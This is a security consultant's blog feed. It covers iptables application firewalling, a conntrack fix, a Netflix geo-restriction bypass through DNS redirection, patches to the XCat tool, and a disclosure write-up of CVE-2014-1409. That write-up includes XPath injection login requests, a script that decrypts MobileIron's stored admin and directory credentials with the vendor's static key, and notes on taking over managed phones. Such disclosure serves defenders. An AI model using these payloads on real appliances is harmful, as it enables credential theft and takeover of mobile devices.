NextGen$'s blog/2015-07-26T21:45:00+01:00Application firewalling with netfilter (part 2)2015-07-26T21:45:00+01:002015-07-26T21:45:00+01:00Florent Daignièretag:None,2015-07-26:/posts/2015/07/application-firewalling-with-netfilter-part-2/<p>Last time we've looked into <a class="reference external" href="/posts/2015/07/application-firewalling-with-netfilter/">how to do application firewalling with netfilter</a> and came up with an answer whose dependencies aren't shipped by mainstream distributions just yet. Today we will find another way of doing the same thing on with the tools everyone have.</p>
<div class="highlight"><pre><span></span><span class="c1"># install dependencies</span>
sudo apt-get install sudo …</pre></div><p>Last time we've looked into <a class="reference external" href="/posts/2015/07/application-firewalling-with-netfilter/">how to do application firewalling with netfilter</a> and came up with an answer whose dependencies aren't shipped by mainstream distributions just yet. Today we will find another way of doing the same thing on with the tools everyone have.</p>
<div class="highlight"><pre><span></span><span class="c1"># install dependencies</span>
sudo apt-get install sudo
<span class="c1"># create a user called &#39;internet&#39;</span>
sudo adduser internet
<span class="c1"># setup the firewall</span>
sudo iptables -F OUTPUT
sudo iptables -P OUTPUT REJECT
sudo iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport <span class="m">80</span> --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport <span class="m">443</span> --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport <span class="m">53</span> --syn -m owner --uid-owner internet -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport <span class="m">53</span> -m owner --uid-owner internet -j ACCEPT
sudo cat &gt; /etc/sudoers.d/internet <span class="s">&lt;&lt;EOT</span>
<span class="s">Defaults env_keep+=&quot;XAUTHORITY DISPLAY&quot;</span>
<span class="s">$LOGNAME ALL=(internet) NOPASSWD: /usr/bin/iceweasel</span>
<span class="s">EOT</span>
<span class="c1"># give access to our MIT-MAGIC-COOKIE to everyone locally (bad idea! man xauth to understand why)</span>
chmod a+rx <span class="nv">$HOME</span>
chmod a+r <span class="nv">$XAUTHORITY</span>
<span class="c1"># run firefox</span>
sudo -u internet /usr/bin/iceweasel
</pre></div>
<p>That works... but is far from perfect. More details on why to follow in my next post.</p>
Application firewalling with netfilter2015-07-23T15:08:00+01:002015-07-23T15:08:00+01:00Florent Daignièretag:None,2015-07-23:/posts/2015/07/application-firewalling-with-netfilter/<p>Today I've stumbled upon <a class="reference external" href="https://linuxfr.org/forums/linux-general/posts/cas-d-utilisation-n-autoriser-que-firefox-a-sortir-sur-les-ports-http-s">a post</a> from my friend <a class="reference external" href="http://blog.tuttu.info/">Feth</a>, asking whether allowing <strong>only firefox</strong> to access the internet was possible on Linux... Of course it is! Here's one of the many ways:</p>
<div class="highlight"><pre><span></span><span class="c1"># setup the firewall</span>
sudo iptables -F OUTPUT
sudo iptables -P OUTPUT REJECT
sudo iptables -A OUTPUT -m …</pre></div><p>Today I've stumbled upon <a class="reference external" href="https://linuxfr.org/forums/linux-general/posts/cas-d-utilisation-n-autoriser-que-firefox-a-sortir-sur-les-ports-http-s">a post</a> from my friend <a class="reference external" href="http://blog.tuttu.info/">Feth</a>, asking whether allowing <strong>only firefox</strong> to access the internet was possible on Linux... Of course it is! Here's one of the many ways:</p>
<div class="highlight"><pre><span></span><span class="c1"># setup the firewall</span>
sudo iptables -F OUTPUT
sudo iptables -P OUTPUT REJECT
sudo iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport <span class="m">80</span> --syn -m cgroup --cgroup <span class="m">1</span> -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport <span class="m">443</span> --syn -m cgroup --cgroup <span class="m">1</span> -j ACCEPT
<span class="c1"># create a cgroup named firefox</span>
sudo cgcreate -t <span class="nv">$LOGNAME</span>:users -a <span class="nv">$LOGNAME</span>:users -g net_cls:firefox
<span class="c1"># allocate an identifier to the cgroup</span>
<span class="nb">echo</span> <span class="m">1</span> &gt; /sys/fs/cgroup/net_cls/firefox/net_cls.classid
<span class="c1"># run firefox</span>
cgexec -g net_cls:firefox iceweasel <span class="p">&amp;</span>
</pre></div>
<p>The following commands might be useful to debug what's going on:</p>
<div class="highlight"><pre><span></span><span class="nv">$ls</span> -ld /sys/fs/cgroup/net_cls/firefox/
drwx------ <span class="m">2</span> nextgens users <span class="m">0</span> Jul <span class="m">23</span> <span class="m">18</span>:03 /sys/fs/cgroup/net_cls/firefox/
<span class="nv">$cat</span> /sys/fs/cgroup/net_cls/firefox/cgroup.procs
</pre></div>
<p>Attentive readers will notice that the above doesn't work for at least two reasons:</p>
<ul class="simple">
<li>Distros don't ship a version of <a class="reference external" href="https://lwn.net/Articles/569678/">netfilter with cgroup support</a> just yet</li>
<li>A browser without DNS resolution is only marginally useful ;)</li>
</ul>
<p>Tomorrow I might blog about how to recompile/repackage a recent-enough version of iptables; Or maybe a different way of doing the same thing involving SElinux and/or network namespaces; Or maybe rant on how useless application firewalls are (both as a security control and an anti-privacy leakage mitigation).</p>
<p>Feel free to let me know what you prefer in the comments.</p>
Disabling connection tracking on bridge interfaces created by libvirt2015-07-22T10:02:00+01:002015-07-22T10:02:00+01:00Florent Daignièretag:None,2015-07-22:/posts/2015/07/disabling-connection-tracking-on-bridge-interfaces-created-by-libvirt/<p>Today I got bitten by a problem I've already encountered in the past... and as I didn't document it properly, I had to google it again! Let this blog entry be a more permanent documentation than the previous one.</p>
<p>Early in the morning, the supervision system has started alerting me …</p><p>Today I got bitten by a problem I've already encountered in the past... and as I didn't document it properly, I had to google it again! Let this blog entry be a more permanent documentation than the previous one.</p>
<p>Early in the morning, the supervision system has started alerting me that the response time of one of the virtualization hosts we use at <a class="reference external" href="https://www.trustmatta.com/">Matta</a> is going through the roof; making everything 'feel' slow.</p>
<p>Connecting to the system through SSH is already taking tens of seconds, indicating that something is indeed seriously wrong. Modern linux systems use resource isolation in the form of <a class="reference external" href="https://www.kernel.org/doc/Documentation/cgroups/cgroups.txt">cgroups</a> and are quite resilient to obnoxious programs chewing up resources; The traditional <a class="reference external" href="https://en.wikipedia.org/wiki/Fork_bomb">fork-bomb</a> is a lot less effective than it used to be thanks to these improvements.</p>
<p>The following command can be used to see how the processes are grouped by your init system:</p>
<div class="highlight"><pre><span></span>ps xawf -eo pid,user,cgroup,args
</pre></div>
<p>At this stage, when I've finally obtained a command prompt on the remote server, I knew that the cause of the problem was kernel-related. So my first command was <cite>dmesg</cite></p>
<div class="highlight"><pre><span></span><span class="go">...</span>
<span class="go">nf_conntrack: table full, dropping packet.</span>
<span class="go">...</span>
</pre></div>
<p>This message is familiar; being a penetration testing company, we are using and abusing of advanced TCP trickery, confusing the hell out of any stateful firewall in the way. Tonight, the culprit was <a class="reference external" href="https://nmap.org/">Nmap</a> conducting a <a class="reference external" href="https://en.wikipedia.org/wiki/Port_scanner#SYN_scanning">SYN scan</a>...</p>
<p>No matter how much resources I could allocate to the tracking table, it will never be big enough... and fundamentally, there is no reason to filter the traffic bridged from the VM to the network using a stateful firewall. In the past I've decided to deal with that specific problem by setting a rule to tell netfilter to specifically disregard the traffic flowing through the bridged devices. This was achieved with the following command:</p>
<div class="highlight"><pre><span></span>iptables --table raw -A PREROUTING -m physdev --physdev-is-bridged -j NOTRACK
</pre></div>
<p>It worked well; up until the point where a new rule was introduced, negating its effects. The improved solution reads:</p>
<div class="highlight"><pre><span></span><span class="nb">echo</span> net.bridge.bridge-nf-call-iptables<span class="o">=</span><span class="m">0</span> &gt;&gt; /etc/sysctl.conf
sysctl -p
</pre></div>
<p>Live and learn as they say!</p>
Netflix ultimate geolocation bypass with an edgerouter2015-01-05T19:06:00+00:002015-01-05T19:06:00+00:00Florent Daignièretag:None,2015-01-05:/posts/2015/01/netflix-ultimate-geolocation-bypass-with-an-edgerouter/<p>It looks like <a class="reference external" href="http://www.engadget.com/2015/01/03/netflix-clamps-down-on-vpns/">Netflix has updated their geolocation code</a>... attempting to prevent their users from watching content intended for other regions. This post explores a few technical avenues one might consider to bypass it.</p>
<p>Googling around, it becomes increasingly clear that many people are making a living out of selling …</p><p>It looks like <a class="reference external" href="http://www.engadget.com/2015/01/03/netflix-clamps-down-on-vpns/">Netflix has updated their geolocation code</a>... attempting to prevent their users from watching content intended for other regions. This post explores a few technical avenues one might consider to bypass it.</p>
<p>Googling around, it becomes increasingly clear that many people are making a living out of selling bypasses both in the form of technical solutions and support. The signal over noise ratio is very low and after 15mins it has become increasingly clear that tcpdumping the traffic is the way to find out &quot;what they've changed&quot;.</p>
<p>Up until this month, users tend to use two different techniques to get around the restrictions. They either subscribe to a VPN service (in addition to their netflix subscription!) or what providers calls a &quot;smart DNS&quot;. Both solutions are unacceptable to me as they are both completely inadequate security wise. <strong>Why should I trust a random system on the internet with my internet traffic when I don't have to?</strong></p>
<p>To give you an illustrated example of why it's a bad idea, let's talk about what seems to be the most popular solution: <a class="reference external" href="https://hola.org/">Hola</a>; it's free as in free-beer. Turns out that these guys are operating a peer to peer network of proxies, reselling your bandwidth through their <a class="reference external" href="https://luminati.io/">Luminati</a> service. One should keep in mind that, on the internet, if you're not paying, odds are you're the product!</p>
<p>TCPDumping the traffic in and out, it became apparent that the geolocation is happening at the DNS level. Luckily for us, there are plenty of open DNS resolvers on the internet. While I won't write down the one I use for obvious reasons, I'll share a list of ideas where you can find one (for free!):</p>
<ul class="simple">
<li><a class="reference external" href="https://www.google.com/search?q=netflix+dns">dedicated websites</a></li>
<li><a class="reference external" href="https://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack/">DDoS reports</a></li>
<li>FAQ from ISPs</li>
</ul>
<p>Of course, <a class="reference external" href="https://en.wikipedia.org/wiki/DNSChanger">I wouldn't trust any of them with my DNS traffic</a> (unlike most of the tutorials I've found on the internet)... So instead of changing the system's resolver to one of them, here is the edgerouter command I've used:</p>
<div class="highlight"><pre><span></span><span class="go">set service dns forwarding options server=/netflix.com/$ip</span>
</pre></div>
<p>This ensures that only the traffic going to *.netflix.com will be queried through that DNS resolver.</p>
<p>This has been working for years, up until this month where the application has been updated. Ever since, the geolocation finds out which zone I'm entitled to. TCPDumping the traffic has once again proved useful and told me that now Netflix is doing two different DNS queries using both the system's configured resolver and a hardcoded one (Google's). It then decides which zone you're in, based on the result of both, trusting Google's over your local DNS. So yes; if you used to bypass their zone restriction using DNS, they know it ;)</p>
<p>My initial (naive) attempt was to try out what happens when Google can't be reached. The following command does just that:</p>
<div class="highlight"><pre><span></span><span class="go">set protocols static route 8.8.8.8 blackhole</span>
</pre></div>
<p>This works for some definition of &quot;work&quot;. The stream will eventually start but you will have to wait for timeouts while navigating and picking your movie; making the whole trick sub-optimal. A better solution is to do destination NAT and pretend that our local resolver is Google's. it can be achieved using the following config:</p>
<div class="highlight"><pre><span></span><span class="go">edit service nat rule 4999</span>
<span class="go"> description netflix</span>
<span class="go"> destination {</span>
<span class="go"> address 8.8.8.8</span>
<span class="go"> port 53</span>
<span class="go"> }</span>
<span class="go"> inbound-interface $LAN_IF</span>
<span class="go"> inside-address {</span>
<span class="go"> address $LAN_IP</span>
<span class="go"> }</span>
<span class="go"> protocol tcp_udp</span>
<span class="go"> type destination</span>
</pre></div>
<p>Using iptables, it would look like that:</p>
<div class="highlight"><pre><span></span>iptables -t nat -A PREROUTING -d <span class="m">8</span>.8.8.8/32 -i <span class="nv">$LAN_IF</span> -p udp -m udp --dport <span class="m">53</span> -j DNAT --to-destination <span class="nv">$LAN_IP</span>
iptables -t nat -A PREROUTING -d <span class="m">8</span>.8.8.8/32 -i <span class="nv">$LAN_IF</span> -p tcp -m tcp --dport <span class="m">53</span> -j DNAT --to-destination <span class="nv">$LAN_IP</span>
</pre></div>
<p>That works wonders and is the ultimate solution to me. It's not wasting bandwidth encapsulating traffic through a tunnel nor trusting random unknowns on the internet to route it for me... and it's free!</p>
CVE-2014-1409 or the sad tale of an XPath injection affecting mobileiron products2014-06-23T11:06:00+01:002014-06-23T11:06:00+01:00Florent Daignièretag:None,2014-06-23:/posts/2014/06/cve-2014-1409-or-the-sad-tale-of-an-xpath-injection-affecting-mobileiron-products/<p>Following up on my last post about <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injections, I will document part of the process we went through to exploit <a class="reference external" href="https://www.trustmatta.com/advisories/MATTA-2013-004.txt">CVE-2014-1409</a> and hopefully convince a few that this category of bugs is no joke and should be looked for during pentests.</p>
<p>So, what about it? Well, let me tell …</p><p>Following up on my last post about <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injections, I will document part of the process we went through to exploit <a class="reference external" href="https://www.trustmatta.com/advisories/MATTA-2013-004.txt">CVE-2014-1409</a> and hopefully convince a few that this category of bugs is no joke and should be looked for during pentests.</p>
<p>So, what about it? Well, let me tell you a story. The story of a remote-root which doesn't involve any memory corruption on a very widely used and deployed appliance sold by a security vendor.</p>
<p>In terms of exploitation methodology, here is what needs doing:</p>
<blockquote>
<ol class="arabic simple">
<li>identify a valid/error pattern (see requests below)</li>
<li>turn the valid/error pattern into a true/false one (trivial)</li>
<li>exfiltrate the XML content (see structure of the document below to build an optimized query)</li>
<li>de-obfuscate the credentials (see below).</li>
<li>login</li>
</ol>
</blockquote>
<p>All of the above has been described in <a class="reference external" href="https://www.trustmatta.com/advisories/MATTA-2013-004.txt">MATTA-2013-004</a>; The vendor has issued a patch and it was made public on 02-04-14. I feel like releasing more details will help other members of the security community develop signatures for IDSes and plugins for vulnerability scanners.</p>
<p>The two HTTP requests I use to check whether an appliance is vulnerable are the following:</p>
<div class="highlight"><pre><span></span><span class="n">POST</span> <span class="o">/</span><span class="n">mics</span><span class="o">/</span><span class="n">j_spring_security_check</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span>
<span class="n">Host</span><span class="p">:</span> <span class="n">XXX</span>
<span class="n">Referer</span><span class="p">:</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">XXX</span><span class="o">/</span><span class="n">mics</span><span class="o">/</span><span class="n">login</span><span class="o">.</span><span class="n">jsp</span>
<span class="n">Connection</span><span class="p">:</span> <span class="n">close</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">application</span><span class="o">/</span><span class="n">x</span><span class="o">-</span><span class="n">www</span><span class="o">-</span><span class="n">form</span><span class="o">-</span><span class="n">urlencoded</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">48</span>
<span class="n">j_username</span><span class="o">=</span><span class="n">x</span><span class="s1">&#39;and+concat(&#39;</span><span class="mi">1</span><span class="s1">&#39;,&#39;</span><span class="mi">1</span><span class="s1">&#39;)=&#39;</span><span class="mi">1</span><span class="o">&amp;</span><span class="n">j_password</span><span class="o">=</span><span class="n">p</span>
</pre></div>
<p>-&gt; 'valid' case: response will be HTTP 302</p>
<div class="highlight"><pre><span></span><span class="n">POST</span> <span class="o">/</span><span class="n">mics</span><span class="o">/</span><span class="n">j_spring_security_check</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span>
<span class="n">Host</span><span class="p">:</span> <span class="n">XXX</span>
<span class="n">Referer</span><span class="p">:</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">XXX</span><span class="o">/</span><span class="n">mics</span><span class="o">/</span><span class="n">login</span><span class="o">.</span><span class="n">jsp</span>
<span class="n">Connection</span><span class="p">:</span> <span class="n">close</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">application</span><span class="o">/</span><span class="n">x</span><span class="o">-</span><span class="n">www</span><span class="o">-</span><span class="n">form</span><span class="o">-</span><span class="n">urlencoded</span>
<span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">48</span>
<span class="n">j_username</span><span class="o">=</span><span class="n">x</span><span class="s1">&#39;and+concat(&#39;</span><span class="mi">1</span><span class="s1">&#39;,&#39;</span><span class="mi">1</span><span class="s1">&#39;=)&#39;</span><span class="mi">1</span><span class="o">&amp;</span><span class="n">j_password</span><span class="o">=</span><span class="n">p</span>
</pre></div>
<p>-&gt; 'error' case: response will be HTTP 404</p>
<p>With the assistance of <a class="reference external" href="https//github.com/orf/xcat/">XCat</a> and the following <a class="reference external" href="../exploiting-xpath-injection-vulnerabilities-with-xcat/index.html">patches</a>, you should be able to download the device's configuration file. It contains the obfuscated credentials you will need to connect to <a class="reference external" href="https://XXX/mics/login.jsp">https://XXX/mics/login.jsp</a> as administrator! Keep in mind that you need to set the Referer header for the test vector to work; I have a separate <a class="reference external" href="https//github.com/orf/xcat/">XCat</a> patch for that too.</p>
<div class="highlight"><pre><span></span><span class="nt">&lt;configuration&gt;&lt;identity&gt;</span>
<span class="nt">&lt;user&gt;</span>
<span class="nt">&lt;principal&gt;</span>admin<span class="nt">&lt;/principal&gt;</span>
<span class="nt">&lt;password&gt;</span>base64 encoded obfuscated password<span class="nt">&lt;/password&gt;</span>
<span class="nt">&lt;/user&gt;</span>
<span class="nt">&lt;/identity&gt;&lt;/configuration&gt;</span>
</pre></div>
<p>If the applicance is linked to active-directory (or another LDAP server), it will contain the credentials to connect to it (&lt;directoryUserID&gt; and &lt;directoryPassword&gt;).</p>
<p>The credentials are obfuscated using encryption and a static key. The following script should get you the plaintext:</p>
<div class="highlight"><pre><span></span><span class="ch">#!/usr/bin/env python</span>
<span class="c1">#</span>
<span class="c1"># MobileIron uses AES-ECB-PKCS1.5 (with a known key)</span>
<span class="c1"># to store credentials... What a brilliant idea!</span>
<span class="c1">#</span>
<span class="c1"># This script is about checking whether the provided</span>
<span class="c1"># hash is vulnerable to CVE-2013-7286 or not.</span>
<span class="c1">#</span>
<span class="c1"># NextGen$ ~ 2013</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span><span class="o">&lt;</span><span class="mi">2</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="s1">&#39;Usage: ./CVE-2013-7286.py &lt;base64encoded blob&gt;&#39;</span><span class="p">)</span>
<span class="n">BS</span> <span class="o">=</span> <span class="mi">8</span>
<span class="n">unpad</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">s</span> <span class="p">:</span> <span class="n">s</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="o">-</span><span class="nb">ord</span><span class="p">(</span><span class="n">s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])]</span>
<span class="k">if</span> <span class="vm">__name__</span><span class="o">==</span> <span class="s2">&quot;__main__&quot;</span><span class="p">:</span>
<span class="c1"># Generate the master key...</span>
<span class="c1"># Yes. It&#39;s not a typo!</span>
<span class="n">phrase</span> <span class="o">=</span> <span class="s1">&#39;Hakuna matata what a woderful phrase&#39;</span>
<span class="n">m</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha1</span><span class="p">()</span>
<span class="n">m</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">phrase</span><span class="p">)</span>
<span class="c1"># We only want the 16 first bytes (128bit key, 160bit hash function)</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">m</span><span class="o">.</span><span class="n">digest</span><span class="p">()[:</span><span class="mi">16</span><span class="p">]</span>
<span class="n">ciphertext</span> <span class="o">=</span> <span class="n">binascii</span><span class="o">.</span><span class="n">a2b_base64</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="n">unpad</span><span class="p">(</span><span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">))</span>
<span class="n">vulnerable</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">plaintext</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="ow">and</span> <span class="nb">all</span><span class="p">(</span><span class="n">c</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">printable</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">plaintext</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1">VULNERABLE TO CVE-2013-7286&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;&#39;</span> <span class="k">if</span> <span class="n">vulnerable</span> <span class="k">else</span> <span class="s1">&#39;NOT &#39;</span><span class="p">)</span>
</pre></div>
<p>Once logged in as administrator on the device, it's game over. You can remotely deploy apps (and get shells!) on all the attached mobile devices and you can capture the traffic flowing through the device. Moreover, you might be able to reuse the AD credentials elsewhere on the infrastructure... OWA and SSL-VPNs are obvious targets. Overall it's a very difficult compromize to recover from as the defender; a successfull attack leaves no useful log to speak of.</p>
Exploiting XPath injection vulnerabilities with XCat2014-06-21T11:06:00+01:002014-06-21T11:06:00+01:00Florent Daignièretag:None,2014-06-21:/posts/2014/06/exploiting-xpath-injection-vulnerabilities-with-xcat/<p><a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection bugs are relatively common in web applications, yet it's a vulnerability class ignored by the vast majority of pentesters.</p>
<p>I think that there is two main reasons for that:</p>
<ul class="simple">
<li>The tooling to exploit this type of vulnerabilities sucks.</li>
<li>There is very few documented cases of &quot;useful&quot; bugs being …</li></ul><p><a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection bugs are relatively common in web applications, yet it's a vulnerability class ignored by the vast majority of pentesters.</p>
<p>I think that there is two main reasons for that:</p>
<ul class="simple">
<li>The tooling to exploit this type of vulnerabilities sucks.</li>
<li>There is very few documented cases of &quot;useful&quot; bugs being exploited</li>
</ul>
<p>This blog post will attempt to address the former, by detailing several trivial patches that have been submitted to <a class="reference external" href="https//github.com/orf/xcat/">XCat</a>, an automated <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection exploitation tool. As you will soon realise, like most pentesting tools, <a class="reference external" href="https//github.com/orf/xcat/">XCat</a> needs some love... In its current form, it's next to useless.</p>
<p>Patch number one: should you ever need to exploit a bug where the HTTP-response-code is your oracle, you will need the following:</p>
<div class="highlight"><pre><span></span>commit 705b58c61efe116694dcfb0c62db9fe0daf1bbda
Author: Florent Daigniere &lt;nextgens@freenetproject.org&gt;
Date: Sat Jan 18 21:28:20 2014 +0000
The logic is not quite right; it can be HTTP codes too
<span class="gh">diff --git a/src/xcat.py b/src/xcat.py</span>
<span class="gh">index 21bf950..f57b4e7 100755</span>
<span class="gd">--- a/src/xcat.py</span>
<span class="gi">+++ b/src/xcat.py</span>
<span class="gu">@@ -445,8 +445,8 @@ if __name__ == &quot;__main__&quot;:</span>
sys.stderr.write(&quot;XCat version %s\n&quot;%__VERSION__)
<span class="gd">- if not any([args.false_keyword, args.true_keyword, args.error_keyword]):</span>
<span class="gd">- sys.stderr.write(&quot;Error: You must supply a false, true or error keywor</span>
<span class="gi">+ if not any([args.false_keyword, args.true_keyword, args.error_keyword, arg</span>
<span class="gi">+ sys.stderr.write(&quot;Error: You must supply a false, true or error keywor</span>
exit()
if not args.post_argument:
</pre></div>
<p>Patch number two: if the bug's oracle is error based, this will also be useful...</p>
<div class="highlight"><pre><span></span>commit 290e93a1a9a57529e7bc07027a87beca9135f43d
Author: Florent Daigniere &lt;nextgens@freenetproject.org&gt;
Date: Sat Jan 18 21:28:54 2014 +0000
Fix the HTTP-error code case
<span class="gh">diff --git a/src/lib/payloads.py b/src/lib/payloads.py</span>
<span class="gh">index 0093c7d..11855c4 100644</span>
<span class="gd">--- a/src/lib/payloads.py</span>
<span class="gi">+++ b/src/lib/payloads.py</span>
<span class="gu">@@ -91,7 +91,7 @@ class PayloadMaker(object):</span>
self._headers = Headers({&quot;User-Agent&quot;:[config.user_agent], &quot;Referer&quot;:[
<span class="gd">- if config.error_keyword:</span>
<span class="gi">+ if config.error_keyword or config.error_code:</span>
self.BASE = string.Template(&quot;&#39; and (if ($payload) then error() els
else:
self.BASE = string.Template(&quot;&#39; and $payload and &#39;1&#39;=&#39;1&quot;.replace(&quot;&#39;
</pre></div>
<p>I hope these patches will save a few hours to the next poor soul that runs into the same issue as I did.</p>
<p>See you soon for a follow-up post, where I will try to convince the audience that <a class="reference external" href="https://www.owasp.org/index.php/XPATH_Injection">XPath</a> injection bugs can mean serious business.</p>
Is SantanderUK compromised?2014-03-25T10:10:00+00:002014-03-25T10:10:00+00:00Florent Daignièretag:None,2014-03-25:/posts/2014/03/is-santanderuk-compromised/<p>This morning I have received a special spam, the kind that warrants a blog post.</p>
<p>It's interesting for several reasons:</p>
<ul class="simple">
<li>It has my name in the Subject Header</li>
<li>It came through an address that I have only given to my bank</li>
<li>It uses a clever old-school trick to avoid <a class="reference external" href="https://en.wikipedia.org/wiki/Bayesian_spam_filtering">bayesian …</a></li></ul><p>This morning I have received a special spam, the kind that warrants a blog post.</p>
<p>It's interesting for several reasons:</p>
<ul class="simple">
<li>It has my name in the Subject Header</li>
<li>It came through an address that I have only given to my bank</li>
<li>It uses a clever old-school trick to avoid <a class="reference external" href="https://en.wikipedia.org/wiki/Bayesian_spam_filtering">bayesian filtering</a> (text hidden with white fonts on a white background)</li>
<li>It used Microsoft's delivery infrastructure (and therefore didn't have any problems with <a class="reference external" href="https://en.wikipedia.org/wiki/Greylisting">grey-listing</a>)</li>
<li>It uses 'sane' headers and no links (which tends to be a red-flag for spams)</li>
</ul>
<p>As a security professional, when I see that type of targeted spam, several questions spring to mind:</p>
<ul class="simple">
<li>Have they sold my details? If so, where did they get my consent from?</li>
<li>If not, they must have been compromised. What else have they leaked? Do they even know?</li>
</ul>
<p>I have sent them an email this morning, asking the questions above... and will update this post with their reply.</p>
<p>For the curious, here is a copy of the <a class="reference external" href="https://gist.github.com/nextgens/9758683">spam from Santander</a>.</p>
Hello world!2014-03-21T11:06:00+00:002014-03-21T11:06:00+00:00Florent Daignièretag:None,2014-03-21:/posts/2014/03/hello-world/<p>This is our first post!! A classic</p>
<div class="highlight"><pre><span></span><span class="k">print</span><span class="p">(</span><span class="s2">&quot;HELO world!&quot;</span><span class="p">)</span>
</pre></div>
<p>See you soon ;)</p>
<p>This is our first post!! A classic</p>
<div class="highlight"><pre><span></span><span class="k">print</span><span class="p">(</span><span class="s2">&quot;HELO world!&quot;</span><span class="p">)</span>
</pre></div>
<p>See you soon ;)</p>